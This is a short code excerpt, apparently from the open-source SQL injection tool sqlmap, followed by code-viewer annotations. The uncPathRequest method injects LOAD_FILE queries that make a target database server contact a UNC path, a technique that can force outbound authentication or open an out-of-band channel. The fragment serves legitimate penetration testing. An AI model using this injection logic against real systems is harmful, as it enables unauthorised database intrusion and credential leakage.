(self)
| 110 | logger.debug("keeping existing UDF '%s' as requested" % udf) |
| 111 | |
| 112 | def uncPathRequest(self): |
| 113 | if not isStackingAvailable(): |
| 114 | query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath) |
| 115 | query = agent.suffixQuery(query) |
| 116 | payload = agent.payload(newValue=query) |
| 117 | |
| 118 | Request.queryPage(payload) |
| 119 | else: |
| 120 | inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True) |
nothing calls this directly
no test coverage detected